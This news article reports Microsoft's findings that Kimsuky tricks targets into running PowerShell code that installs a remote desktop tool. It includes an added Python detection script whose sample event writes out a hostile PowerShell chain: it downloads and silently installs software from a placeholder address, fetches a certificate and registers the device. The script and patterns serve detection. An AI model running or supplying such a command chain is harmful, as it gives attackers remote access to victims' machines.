North Korean hackers Kimsuky exploiting the oldest critical vulnerability – the user


North Korean hackers have joined the cyberattack bandwagon, asking users to copy and paste malicious code into PowerShell themselves.

Honed by fake CAPTCHA campaigns, the self-infection attack vector is now being abused by Kimsuky, the North Korean state-sponsored threat actor also known as Emerald Sleet and Velvet Chollima.

Microsoft Threat Intelligence warns that Kimsuky is masquerading as South Korean officials, gradually gaining the target’s trust and then sending spear-phishing emails with PDF attachments.


The PDFs themselves do not infect the system, however. The hackers rely on users following written instructions.

To read the PDF file, victims are lured into clicking a link that leads to instructions. The hackers ask them “to register your device” by following three steps: launching PowerShell as administrator, pasting the provided code, and pressing “Enter.”

In this way, the user infects their own system with malware.

“If the target runs the code as an administrator, the code downloads and installs a browser-based remote desktop tool, downloads a certificate file with a hardcoded PIN from a remote server,” researchers at Microsoft explain.

“The code then sends a web request to a remote server to register the victim's device using the downloaded certificate and PIN. This allows the threat actor to access the device and carry out data exfiltration.”
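As an added defender-side illustration (not part of the original article or of Microsoft's report), the Python sketch below scores constructed PowerShell script-block log events for the chain Microsoft describes: an elevated session that downloads and installs a tool, fetches a certificate file, and sends a PIN to a registration endpoint. The sample events, hostnames, paths and the 203.0.113.5 address are constructed placeholders, not real indicators.

```python
import re

# Indicator patterns for the stages described in the article: a web download,
# an install/launch step, a certificate file, a PIN, and a device-registration request.
STAGES = {
    "download": re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|invoke-restmethod|\bcurl\b", re.I),
    "install": re.compile(r"msiexec|start-process|expand-archive|-outfile", re.I),
    "certificate": re.compile(r"\.(pem|pfx|cer|crt)\b|certificate", re.I),
    "pin": re.compile(r"\bpin\b", re.I),
    "register": re.compile(r"\bregist(er|ration)\b|\benrol", re.I),
}

# Constructed script-block events (shape loosely modelled on Event ID 4104); the
# hostnames, paths and the 203.0.113.5 address are placeholders, not real IoCs.
SAMPLE_EVENTS = [
    {"host": "ws-01", "elevated": True, "script": (
        "Invoke-WebRequest -Uri http://203.0.113.5/rd.msi -OutFile $env:TEMP\\rd.msi; "
        "Start-Process msiexec -ArgumentList '/i',$env:TEMP\\rd.msi,'/qn' -Wait; "
        "Invoke-WebRequest -Uri http://203.0.113.5/cert.pem -OutFile $env:TEMP\\cert.pem; "
        "Invoke-RestMethod -Method Post -Uri http://203.0.113.5/register -Body @{pin='123456'}")},
    {"host": "ws-02", "elevated": False,
     "script": "Get-ChildItem C:\\Users | Measure-Object"},
    {"host": "ws-03", "elevated": True,
     "script": "Invoke-WebRequest -Uri https://example.org/update.zip -OutFile u.zip"},
]

def score_event(event):
    """Return the names of the chain stages present in one script block."""
    return [name for name, pat in STAGES.items() if pat.search(event["script"])]

def triage(events, min_stages=3):
    """Flag elevated sessions whose script block covers at least min_stages of the chain.
    A lone download in an elevated session (ws-03) is routine admin work and is not flagged."""
    flagged = []
    for ev in events:
        hits = score_event(ev)
        if ev["elevated"] and len(hits) >= min_stages:
            flagged.append((ev["host"], hits))
    return flagged

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS):
        print(f"{host}: suspicious self-infection chain, stages={hits}")
```

The stage threshold is the tunable part: requiring several stages in one block keeps a single `Invoke-WebRequest` from paging an analyst while still catching the download, certificate and registration sequence together.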

Kimsuky mainly targets people involved in international affairs, with a particular focus on Northeast Asia. Other targets include Western non-governmental organizations (NGOs), government agencies and services, and media outlets.

Microsoft warns that the shift in tactics “is indicative of a new approach to compromising their traditional espionage targets.” The company recommends using advanced anti-phishing solutions and training users about the dangers of clicking links and running malicious scripts.


Kimsuky is just one of North Korea's state-sponsored threat groups. It has been active since 2012 and has siphoned millions of dollars to fund the regime’s military and weapons programs. The North Korean regime most likely tasked it with a global intelligence-gathering mission. To exfiltrate the desired information from victims, the hackers previously employed many common social engineering tactics, spear-phishing, and watering hole attacks.